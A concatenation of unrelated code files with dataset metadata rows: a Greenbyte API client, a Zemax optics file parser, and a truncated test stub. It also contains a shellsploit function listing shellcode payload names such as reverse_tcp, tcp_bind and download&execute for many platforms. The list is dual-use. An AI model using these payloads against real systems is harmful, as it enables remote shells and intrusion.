(exclusive), in [RFC 3339, section 5.6](https://tools.ietf.org/html/rfc3339#section-5.6) **date-time** format: * Timestamps ending with 'Z' are treated as UTC. Example: "2020-01-01T00:00:00Z" * Time zone (UTC) offset timestamps ending with '+HH:mm'/"-HH:mm" are also supported. Example: "2020-01-01T02:00:00-02:00" * Other timestamps are treated as being in the time zone configured in the Greenbyte Platform. Example: "2020-01-01T00:00:00" The end timestamp is **not** included in the time interval: for example, to select the full month of March 2020, set `timestampStart` to "2020-03-01T00:00:00" and `timestampEnd` to "2020-04-01T00:00:00". device_ids (list of int, optional): What devices to get downtime events for. site_ids (list of int, optional): What sites to get downtime events for. fields (list of string, optional): Which fields to include in the response. 
Valid fields are those defined in the `DowntimeEvent` schema (See Response Type). By default all fields are included. page_size (int, optional): The number of items to return per page. page (int, optional): Which page to return when the number of items exceed the page size. use_utc (bool, optional): Set to true to get timestamps in UTC. Returns: list of DowntimeEvent: Response from the API. A list of downtime events matching the filter parameters. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ # Prepare query URL _url_path = '/downtime-events' _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_parameters = { 'timestampStart': APIHelper.when_defined(APIHelper.RFC3339DateTime, timestamp_start), 'timestampEnd': APIHelper.when_defined(APIHelper.RFC3339DateTime, timestamp_end), 'deviceIds': device_ids, 'siteIds': site_ids, 'fields': fields, 'pageSize': page_size, 'page': page, 'useUtc': use_utc } _query_builder = APIHelper.append_url_with_query_parameters(_query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers _headers = { 'accept': 'application/json' } # Prepare and execute request _request = self.http_client.get(_query_url, headers=_headers) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. ', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, DowntimeEvent.from_dictionary) def list_site_accesses(self, timestamp_start, timestamp_end, device_ids=None, site_ids=None, fields=None, page_size=50, page=1, use_utc=False): """Does a GET request to /site-accesses. **(BETA)** Gets a list of site accesses. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. 
Some details might change before it is released as a stable version._ Args: timestamp_start (datetime): The beginning of the time interval to get data for (inclusive), in [RFC 3339, section 5.6](https://tools.ietf.org/html/rfc3339#section-5.6) **date-time** format: * Timestamps ending with 'Z' are treated as UTC. Example: "2020-01-01T00:00:00Z" * Time zone (UTC) offset timestamps ending with '+HH:mm'/"-HH:mm" are also supported. Example: "2020-01-01T02:00:00-02:00" * Other timestamps are treated as being in the time zone configured in the Greenbyte Platform. Example: "2020-01-01T00:00:00" The start timestamp **is** included in the time interval: for example, to select the full month of March 2020, set `timestampStart` to "2020-03-01T00:00:00" and `timestampEnd` to "2020-04-01T00:00:00". timestamp_end (datetime): The end of the time interval to get data for (exclusive), in [RFC 3339, section 5.6](https://tools.ietf.org/html/rfc3339#section-5.6) **date-time** format: * Timestamps ending with 'Z' are treated as UTC. Example: "2020-01-01T00:00:00Z" * Time zone (UTC) offset timestamps ending with '+HH:mm'/"-HH:mm" are also supported. Example: "2020-01-01T02:00:00-02:00" * Other timestamps are treated as being in the time zone configured in the Greenbyte Platform. Example: "2020-01-01T00:00:00" The end timestamp is **not** included in the time interval: for example, to select the full month of March 2020, set `timestampStart` to "2020-03-01T00:00:00" and `timestampEnd` to "2020-04-01T00:00:00". device_ids (list of int, optional): What devices to get site accesses for. site_ids (list of int, optional): What sites to get site accesses for. fields (list of string, optional): Which fields to include in the response. Valid fields are those defined in the `SiteAccess` schema (See Response Type). By default all fields are included. page_size (int, optional): The number of items to return per page. page (int, optional): Which page to return when the number of items exceed the page size. use_utc (bool, optional): Set to true to get timestamps in UTC. Returns: list of SiteAccess: Response from the API. A list of site accesses matching the filter parameters. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ # Prepare query URL _url_path = '/site-accesses' _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_parameters = { 'timestampStart': APIHelper.when_defined(APIHelper.RFC3339DateTime, timestamp_start), 'timestampEnd': APIHelper.when_defined(APIHelper.RFC3339DateTime, timestamp_end), 'deviceIds': device_ids, 'siteIds': site_ids, 'fields': fields, 'pageSize': page_size, 'page': page, 'useUtc': use_utc } _query_builder = APIHelper.append_url_with_query_parameters(_query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers _headers = { 'accept': 'application/json' } # Prepare and execute request _request = self.http_client.get(_query_url, headers=_headers) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. 
', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, SiteAccess.from_dictionary) def list_device_accesses(self, site_access_id, fields=None, page_size=50, page=1, use_utc=False): """Does a GET request to /site-accesses/{siteAccessId}/device-accesses. **(BETA)** Gets a list of device accesses belonging to a site access. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Args: site_access_id (int): The id of the site access. fields (list of string, optional): Which fields to include in the response. Valid fields are those defined in the `DeviceAccess` schema (See Response Type). By default all fields are included. page_size (int, optional): The number of items to return per page. page (int, optional): Which page to return when the number of items exceed the page size. use_utc (bool, optional): Set to true to get timestamps in UTC. Returns: list of DeviceAccess: Response from the API. A list of device accesses. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ # Prepare query URL _url_path = '/site-accesses/{siteAccessId}/device-accesses' _url_path = APIHelper.append_url_with_template_parameters(_url_path, { 'siteAccessId': site_access_id }) _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_parameters = { 'fields': fields, 'pageSize': page_size, 'page': page, 'useUtc': use_utc } _query_builder = APIHelper.append_url_with_query_parameters(_query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers _headers = { 'accept': 'application/json' } # Prepare and execute request _request = self.http_client.get(_query_url, headers=_headers) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. 
', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 404: raise APIException('The requested resource could not be found.', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, DeviceAccess.from_dictionary) def list_organizations(self): """Does a GET request to /organizations. **(BETA)** Gets a list of organizations. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Returns: list of Organization: Response from the API. A list of organizations. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ # Prepare query URL _url_path = '/organizations' _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_url = APIHelper.clean_url(_query_builder) # Prepare headers _headers = { 'accept': 'application/json' } # Prepare and execute request _request = self.http_client.get(_query_url, headers=_headers) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. ', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. 
', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, Organization.from_dictionary) def list_personnel(self, fields=None, page_size=50, page=1): """Does a GET request to /personnel. **(BETA)** Gets a list of personnel. _🔐 This endpoint requires the **Plan** endpoint permission._ _This is a beta feature. Some details might change before it is released as a stable version._ Args: fields (list of string, optional): Which fields to include in the response. Valid fields are those defined in the `Personnel` schema (See Response Type). By default all fields are included. page_size (int, optional): The number of items to return per page. page (int, optional): Which page to return when the number of items exceed the page size. Returns: list of Personnel: Response from the API. A list of personnel matching the filter parameters. Raises: APIException: When an error occurs while fetching the data from the remote API. This exception includes the HTTP Response code, an error message, and the HTTP body that was received in the request. """ # Prepare query URL _url_path = '/personnel' _query_builder = Configuration.get_base_uri() _query_builder += _url_path _query_parameters = { 'fields': fields, 'pageSize': page_size, 'page': page } _query_builder = APIHelper.append_url_with_query_parameters(_query_builder, _query_parameters, Configuration.array_serialization) _query_url = APIHelper.clean_url(_query_builder) # Prepare headers _headers = { 'accept': 'application/json' } # Prepare and execute request _request = self.http_client.get(_query_url, headers=_headers) CustomHeaderAuth.apply(_request) _context = self.execute_request(_request) # Endpoint and global error handling using HTTP status codes. if _context.response.status_code == 400: raise ProblemDetailsException('The request cannot be fulfilled due to bad syntax.', _context) elif _context.response.status_code == 401: raise APIException('The request is missing a valid API key. ', _context) elif _context.response.status_code == 403: raise APIException('One of the following: * The API key does not authorize access to the requested endpoint because of a missing endpoint permission. * The API key does not authorize access to the requested data. Devices, sites or data signals can be limited. ', _context) elif _context.response.status_code == 405: raise APIException('The HTTP method is not allowed for the endpoint.', _context) elif _context.response.status_code == 429: raise ProblemDetailsException('The API key has been used in too many requests in a given amount of time. The following headers will be set in the response: * `X-Rate-Limit-Limit` – The rate limit period (for example "1m", "12h", or "1d"). * `X-Rate-Limit-Remaining` – The remaining number of requests for this period. * `X-Rate-Limit-Reset` – The UTC timestamp string (in ISO 8601 format) when the remaining number of requests resets. The limit is currently 1,000 requests/minute per API key and IP address. ', _context) self.validate_response(_context) # Return appropriate type return APIHelper.json_deserialize(_context.response.raw_body, Personnel.from_dictionary)
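For orientation, a minimal sketch of how a generated client in this style might be called. The controller class name `PlanApi` and the `Configuration.api_key` attribute below are illustrative assumptions, not taken from the file above; only the method names and parameters come from the code itself.

# Hypothetical usage sketch for an APIMatic-style generated client.
# `PlanApi` and `Configuration.api_key` are assumed names for illustration.
from datetime import datetime

Configuration.api_key = 'my-api-key'   # assumed: auth setup for CustomHeaderAuth
client = PlanApi()                     # assumed: the controller class above

# List downtime events for two devices over March 2020 (end is exclusive).
events = client.list_downtime_events(
    timestamp_start=datetime(2020, 3, 1),
    timestamp_end=datetime(2020, 4, 1),
    device_ids=[1, 2],
    page_size=50,
    page=1,
)
for event in events:
    print(event)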
53.74356
539
0.63697
5,686
45,897
5.014773
0.055751
0.033142
0.039033
0.046468
0.925861
0.911131
0.904819
0.896928
0.893491
0.893491
0
0.026711
0.292786
45,897
853
540
53.806565
0.850519
0.36303
0
0.801061
1
0.05305
0.355209
0.013777
0
0
0
0
0
1
0.026525
false
0
0.039788
0
0.095491
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
abed9e0807ab81cccb1658e1196fda0a9ed8d04b
9,622
py
Python
Parser.py
oxford-pcs/zController
579946dfc4750a892d368508198324011aec6bed
[ "MIT" ]
5
2018-01-16T14:16:10.000Z
2021-07-13T03:45:57.000Z
Parser.py
oxford-pcs/zemax_controller
579946dfc4750a892d368508198324011aec6bed
[ "MIT" ]
null
null
null
Parser.py
oxford-pcs/zemax_controller
579946dfc4750a892d368508198324011aec6bed
[ "MIT" ]
1
2021-04-28T11:54:59.000Z
2021-04-28T11:54:59.000Z
import codecs
from decimal import *

import numpy as np
import pylab as plt


def decode(fname, encoding):
    ''' Decode file with given encoding. '''
    fp = codecs.open(fname, "r", encoding)
    content = fp.readlines()
    fp.close()
    return content


class zCFFftPsf():
    ''' Parse a Zemax FFT PSF output file. '''
    def __init__(self, fname, verbose=True, debug=False):
        self.fname = fname
        self.header = {"WAVE": None, "FIELD": None, "WAVE_EXP": None,
                       "DATA_SPACING": None, "DATA_SPACING_EXP": None,
                       "DATA_AREA": None, "DATA_AREA_EXP": None,
                       "PGRID_SIZE": None, "IGRID_SIZE": None,
                       "CENTRE": None}
        self.data = None
        self.verbose = verbose
        self.debug = debug

    def _parseFileData(self, sampling):
        ''' Read file data into a Numpy array. '''
        content = decode(self.fname, "UTF-16-LE")
        data = []
        for idx, line in enumerate(content):
            try:
                if idx >= 18:
                    data.append([float(i.rstrip('\r\n')) for i in line.split('\t')])
            except TypeError:
                # some non-floatable value has been found
                return False
        self.data = np.array(data)
        if not sampling == self.data.shape:
            # not the same as expected sampling
            return False
        return True

    def _parseFileHeader(self):
        ''' Read file header contents into a dict. '''
        content = decode(self.fname, "UTF-16-LE")
        for idx, line in enumerate(content):
            if idx == 8:
                self.header['WAVE'] = float(line.split()[0].strip())
                if unicode(line.split()[1].rstrip(',').strip()) == u'm':
                    self.header['WAVE_EXP'] = 1
                if unicode(line.split()[1].rstrip(',').strip()) == u'mm':
                    self.header['WAVE_EXP'] = 1e-3
                elif unicode(line.split()[1].rstrip(',').strip()) == u'\xb5m':
                    self.header['WAVE_EXP'] = 1e-6
                elif unicode(line.split()[1].rstrip(',').strip()) == u'nm':
                    self.header['WAVE_EXP'] = 1e-9
                # need the following as Zemax writes a zero X field as a single
                # value, but a zero Y field is written still as (X, 0.)
                try:
                    self.header['FIELD'] = (float(line.split()[3].rstrip(',').strip()),
                                            float(line.split()[4].strip()))
                except ValueError:
                    self.header['FIELD'] = (0, float(line.split()[3].strip()))
            elif idx == 9:
                self.header['DATA_SPACING'] = float(line.split()[3].strip())
                if unicode(line.split()[4].rstrip('.').strip()) == u'm':
                    self.header['DATA_SPACING_EXP'] = 1
                if unicode(line.split()[4].rstrip('.').strip()) == u'mm':
                    self.header['DATA_SPACING_EXP'] = 1e-3
                elif unicode(line.split()[4].rstrip('.').strip()) == u'\xb5m':
                    self.header['DATA_SPACING_EXP'] = 1e-6
                elif unicode(line.split()[4].rstrip('.').strip()) == u'nm':
                    self.header['DATA_SPACING_EXP'] = 1e-9
            elif idx == 10:
                self.header['DATA_AREA'] = float(line.split()[3].strip())
                if unicode(line.split()[4].strip()) == u'm':
                    self.header['DATA_AREA_EXP'] = 1
                if unicode(line.split()[4].strip()) == u'mm':
                    self.header['DATA_AREA_EXP'] = 1e-3
                elif unicode(line.split()[4].strip()) == u'\xb5m':
                    self.header['DATA_AREA_EXP'] = 1e-6
                elif unicode(line.split()[4].strip()) == u'nm':
                    self.header['DATA_AREA_EXP'] = 1e-9
            elif idx == 13:
                self.header['PGRID_SIZE'] = (int(line.split()[3].strip()),
                                             int(line.split()[5].strip()))
            elif idx == 14:
                self.header['IGRID_SIZE'] = (int(line.split()[3].strip()),
                                             int(line.split()[5].strip()))
            elif idx == 15:
                self.header['CENTRE'] = (int(line.split()[4].rstrip(',').strip()),
                                         int(line.split()[6].strip()))
        if None in self.header.viewvalues():
            # not fully populated
            return False
        return True

    def getData(self):
        return np.array(self.data)

    def getHeader(self):
        return self.header

    def parse(self):
        ''' Parse the file fully. '''
        if self._parseFileHeader():
            if self.verbose:
                print "Successfully parsed ZEMAX FFT PSF output file header."
            if self.debug:
                print self.header
            if self._parseFileData(self.header['IGRID_SIZE']):
                if self.debug:
                    plt.imshow(self.data)
                    plt.colorbar()
                    plt.show()
                if self.verbose:
                    print "Successfully parsed ZEMAX FFT PSF output file data."
            else:
                print "Failed to parse ZEMAX FFT PSF output file data."
                return False
        else:
            print "Failed to read ZEMAX FFT PSF output file header."
            return False
        return True


class zCSystemData():
    ''' Parse a Zemax FFT PSF system data file. '''
    def __init__(self, fname, verbose=True, debug=False):
        self.fname = fname
        self.header = {"WFNO": None, "EPD": None}
        self.verbose = verbose
        self.debug = debug
        self.parse()

    def _parseFileHeader(self):
        ''' Read file header contents into a dict. '''
        content = decode(self.fname, "UTF-16-LE")
        for idx, line in enumerate(content):
            if len(line.split(':')) >= 2:
                if "Working F/#" in line.split(':')[0]:
                    self.header['WFNO'] = float(line.split(':')[1].strip())
                elif "Entrance Pupil Diameter" in line.split(':')[0]:
                    self.header['EPD'] = float(line.split(':')[1].strip())
        if None in self.header.viewvalues():
            # not fully populated
            return False
        return True

    def getHeader(self):
        return self.header

    def parse(self):
        ''' Parse the file fully. '''
        if self._parseFileHeader():
            if self.verbose:
                print "Successfully parsed ZEMAX system data file header."
            if self.debug:
                print self.header
        else:
            print "Failed to parse ZEMAX system data file header."
            return False
        return True


class zCWFE():
    ''' Parse a Zemax wavefront error map. '''
    def __init__(self, fname, verbose=True, debug=False):
        self.fname = fname
        self.header = {"WAVE": None, "FIELD": None, "WAVE_EXP": None,
                       "P2V": None, "RMS": None,
                       "EXIT_PUPIL_DIAMETER": None, "SAMPLING": None,
                       "CENTRE": None}
        self.data = None
        self.verbose = verbose
        self.debug = debug

    def _parseFileData(self, sampling):
        ''' Read file data into a Numpy array. '''
        content = decode(self.fname, "UTF-16-LE")
        data = []
        for idx, line in enumerate(content):
            try:
                if idx >= 16:
                    data.append([float(i.rstrip('\r\n')) for i in line.split('\t')])
            except TypeError:
                # some non-floatable value has been found
                return False
        self.data = np.array(data)
        if not sampling == self.data.shape:
            # not the same as expected sampling
            return False
        return True

    def _parseFileHeader(self):
        ''' Read file header contents into a dict. '''
        content = decode(self.fname, "UTF-16-LE")
        for idx, line in enumerate(content):
            if idx == 8:
                self.header['WAVE'] = Decimal(line.split()[0].strip())
                if unicode(line.split()[1].rstrip(',').strip()) == u'm':
                    self.header['WAVE_EXP'] = Decimal('1')
                if unicode(line.split()[1].rstrip(',').strip()) == u'mm':
                    self.header['WAVE_EXP'] = Decimal('1e-3')
                elif unicode(line.split()[1].rstrip(',').strip()) == u'\xb5m':
                    self.header['WAVE_EXP'] = Decimal('1e-6')
                elif unicode(line.split()[1].rstrip(',').strip()) == u'nm':
                    self.header['WAVE_EXP'] = Decimal('1e-9')
                # need the following as Zemax writes a zero X field as a single
                # value, but a zero Y field is written still as (X, 0.)
                try:
                    self.header['FIELD'] = (float(line.split()[3].rstrip(',').strip()),
                                            float(line.split()[4].strip()))
                except ValueError:
                    self.header['FIELD'] = (0, float(line.split()[3].strip()))
            elif idx == 9:
                self.header['P2V'] = float(line.split()[4].strip())
                self.header['RMS'] = float(line.split()[8].strip())
            elif idx == 11:
                self.header['EXIT_PUPIL_DIAMETER'] = float(line.split()[3].strip())
                self.header['EXIT_PUPIL_DIAMETER_UNIT'] = str(line.split()[4].strip())
            if idx == 13:
                self.header['SAMPLING'] = (int(line.split()[3].strip()),
                                           int(line.split()[5].strip()))
            if idx == 14:
                self.header['CENTRE'] = (int(line.split()[4].rstrip(',').strip()),
                                         int(line.split()[6].strip()))
        if None in self.header.viewvalues():
            # not fully populated
            return False
        return True

    def getData(self):
        return self.data

    def getHeader(self):
        return self.header

    def parse(self):
        ''' Parse a file fully. '''
        if self._parseFileHeader():
            if self.verbose:
                print "Successfully parsed ZEMAX WFE output file header."
            if self.debug:
                print self.header
            if self._parseFileData(self.header['SAMPLING']):
                if self.debug:
                    plt.imshow(self.data)
                    plt.colorbar()
                    plt.show()
                if self.verbose:
                    print "Successfully parsed ZEMAX WFE output file data."
            else:
                print "Failed to parse ZEMAX WFE output file data."
                return False
        else:
            print "Failed to read ZEMAX WFE output file header."
            return False
        return True
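A short usage sketch for the parser above. It is Python 2 (matching the `print` statements and `unicode` calls in the code); the file name "psf.txt" is made up for illustration.

# Hypothetical Python 2 usage of zCFFftPsf; "psf.txt" is an assumed file name.
psf = zCFFftPsf("psf.txt", verbose=True, debug=False)
if psf.parse():
    header = psf.getHeader()
    data = psf.getData()
    # spacing in metres = DATA_SPACING * DATA_SPACING_EXP
    print "grid spacing (m):", header['DATA_SPACING'] * header['DATA_SPACING_EXP']
    print "image grid shape:", data.shape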
34.736462
79
0.557369
1,231
9,622
4.300569
0.130788
0.092558
0.048357
0.027201
0.873442
0.828296
0.775973
0.745561
0.705705
0.693993
0
0.016676
0.283309
9,622
276
80
34.862319
0.751015
0.046664
0
0.607477
0
0
0.133263
0.002798
0
0
0
0
0
0
null
null
0
0.018692
null
null
0.060748
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
7
052d08d42ea8e5aabe39ae5d494e8bfa1403a369
125
py
Python
bunny/models/__init__.py
senpai-development/SenpaiSlasher
89842e584b4cd60731ce9c43315c08b02a8dc8e3
[ "MIT" ]
null
null
null
bunny/models/__init__.py
senpai-development/SenpaiSlasher
89842e584b4cd60731ce9c43315c08b02a8dc8e3
[ "MIT" ]
null
null
null
bunny/models/__init__.py
senpai-development/SenpaiSlasher
89842e584b4cd60731ce9c43315c08b02a8dc8e3
[ "MIT" ]
1
2021-10-31T02:40:03.000Z
2021-10-31T02:40:03.000Z
from .command import *  # noqa: F401 F403
from .component import *  # noqa: F401 F403
from .misc import *  # noqa: F401 F403
31.25
43
0.688
18
125
4.777778
0.444444
0.348837
0.488372
0.627907
0.511628
0
0
0
0
0
0
0.183673
0.216
125
3
44
41.666667
0.693878
0.376
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
8
057c283405efc762b7ada4abca4131f219967673
2,818
py
Python
shell/core/shellcodes.py
vasco2016/shellsploit-framework
04eb4a0449acaba0b70c40a78c61a0d5e2527406
[ "MIT" ]
61
2017-06-13T13:48:38.000Z
2022-03-02T17:43:45.000Z
shell/core/shellcodes.py
T0mcat3r/shellsploit-framework
04eb4a0449acaba0b70c40a78c61a0d5e2527406
[ "MIT" ]
null
null
null
shell/core/shellcodes.py
T0mcat3r/shellsploit-framework
04eb4a0449acaba0b70c40a78c61a0d5e2527406
[ "MIT" ]
28
2017-08-15T05:38:27.000Z
2020-12-31T03:39:38.000Z
#------------------Bombermans Team---------------------------------#
#Author  : B3mB4m
#Concat  : b3mb4m@protonmail.com
#Project : https://github.com/b3mb4m/Shellsploit
#LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE
#------------------------------------------------------------------#

from .color import *


def shellcodelist(getlist=False):
    if getlist == False:
        print (bcolors.GREEN + """
    Linux x86
    ===========
        linux86/exec
        linux86/binsh_spawn
        linux86/read
        linux86/chmod
        linux86/tcp_bind
        linux86/reverse_tcp

    Linux x64
    ===========
        linux64/binsh_spawn
        linux64/read
        linux64/tcp_bind
        linux64/reverse_tcp

    Linux x86/x64 [Works on both]
    ===========
        linux/binsh_spawn
        linux/read
        linux/tcp_bind
        linux/reverse_tcp

    Linux ARM
    ===========
        linux_arm/exec
        linux_arm/binsh_spawn
        linux_arm/chmod
        linux_arm/reverse_tcp

    Linux MIPS
    ===========
        linux_mips/binsh_spawn
        linux_mips/chmod
        linux_mips/tcp_bind

    Solaris x86
    ===========
        solarisx86/binsh_spawn
        solarisx86/read
        solarisx86/reverse_tcp
        solarisx86/tcp_bind

    Windows
    ===========
        windows/exec
        windows/messagebox
        windows/download&execute
        windows/reverse_tcp
        windows/tcp_bind

    OSX x86
    ===========
        osx86/tcp_bind
        osx86/binsh_spawn
        osx86/reverse_tcp

    OSX x64
    ===========
        osx64/binsh_spawn
        osx64/reverse_tcp
        osx64/tcp_bind

    FreeBSD x86
    ============
        FreeBSDx86/binsh_spawn
        FreeBSDx86/read
        FreeBSDx86/tcp_bind
        FreeBSDx86/reverse_tcp
        FreeBSDx86/reverse_tcp2 (through /bin/sh)
        FreeBSDx86/exec

    FreeBSD x64
    ============
        FreeBSDx64/exec
        FreeBSDx64/binsh_spawn
        FreeBSDx64/tcp_bind
        FreeBSDx64/reverse_tcp
    """ + bcolors.ENDC)
    else:
        return [
            "linux86/exec",
            "linux86/binsh_spawn",
            "linux86/read",
            "linux86/chmod",
            "linux86/tcp_bind",
            "linux86/reverse_tcp",
            "linux64/binsh_spawn",
            "linux64/read",
            "linux64/tcp_bind",
            "linux64/reverse_tcp",
            "linux/binsh_spawn",
            "linux/read",
            "linux/tcp_bind",
            "linux/reverse_tcp",
            "linux_arm/exec",
            "linux_arm/binsh_spawn",
            "linux_arm/chmod",
            "linux_arm/reverse_tcp",
            "linux_mips/binsh_spawn",
            "linux_mips/chmod",
            "linux_mips/tcp_bind",
            "solarisx86/binsh_spawn",
            "solarisx86/read",
            "solarisx86/reverse_tcp",
            "solarisx86/tcp_bind",
            "windows/exec",
            "windows/messagebox",
            "windows/download&execute",
            "windows/reverse_tcp",
            "windows/tcp_bind",
            "osx86/tcp_bind",
            "osx86/binsh_spawn",
            "osx86/reverse_tcp",
            "osx64/binsh_spawn",
            "osx64/reverse_tcp",
            "osx64/tcp_bind",
            "FreeBSDx86/binsh_spawn",
            "FreeBSDx86/read",
            "FreeBSDx86/tcp_bind",
            "FreeBSDx86/reverse_tcp",
            "FreeBSDx86/reverse_tcp2",
            "FreeBSDx86/exec",
            "FreeBSDx64/exec",
            "FreeBSDx64/binsh_spawn",
            "FreeBSDx64/tcp_bind",
            "FreeBSDx64/reverse_tcp",
        ]
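The function doubles as a pretty-printer and a data source: with the default argument it prints the catalogue, and with `getlist=True` it returns the identifiers for programmatic use. A one-line illustration (nothing here beyond the function above):

# Illustrative only: fetch the machine-readable list instead of printing it.
names = shellcodelist(getlist=True)
print (str(len(names)) + " payload identifiers available")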
15.315217
69
0.660397
330
2,818
5.409091
0.187879
0.112045
0.058824
0.022409
0.836415
0.801681
0.801681
0.801681
0.801681
0.707563
0
0.061847
0.150816
2,818
184
70
15.315217
0.684079
0.104329
0
0.090164
0
0
0.818037
0.193087
0
0
0
0
0
1
0.008197
false
0
0.008197
0
0.02459
0.008197
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
556cf77d99d9dbb7e9f8653a3e578e8c2aafb423
6,813
py
Python
runtime/bamboo-pipeline/test/pipeline_test_use/tests/data_transfer/test_subprocess_ref_constant.py
DomineCore/bamboo-engine
fb4583e70f9e1e87d9d48c2393db8d8104306f37
[ "MIT" ]
55
2021-09-07T11:50:35.000Z
2022-03-23T13:19:38.000Z
runtime/bamboo-pipeline/test/pipeline_test_use/tests/data_transfer/test_subprocess_ref_constant.py
DomineCore/bamboo-engine
fb4583e70f9e1e87d9d48c2393db8d8104306f37
[ "MIT" ]
64
2021-09-07T12:04:12.000Z
2022-03-29T03:47:18.000Z
runtime/bamboo-pipeline/test/pipeline_test_use/tests/data_transfer/test_subprocess_ref_constant.py
DomineCore/bamboo-engine
fb4583e70f9e1e87d9d48c2393db8d8104306f37
[ "MIT" ]
20
2021-09-07T11:52:08.000Z
2022-03-28T08:05:22.000Z
# -*- coding: utf-8 -*-
from ..base import *  # noqa


class TestSubprocessRefConstant(EngineTestCase):
    def test_ref_constant(self):
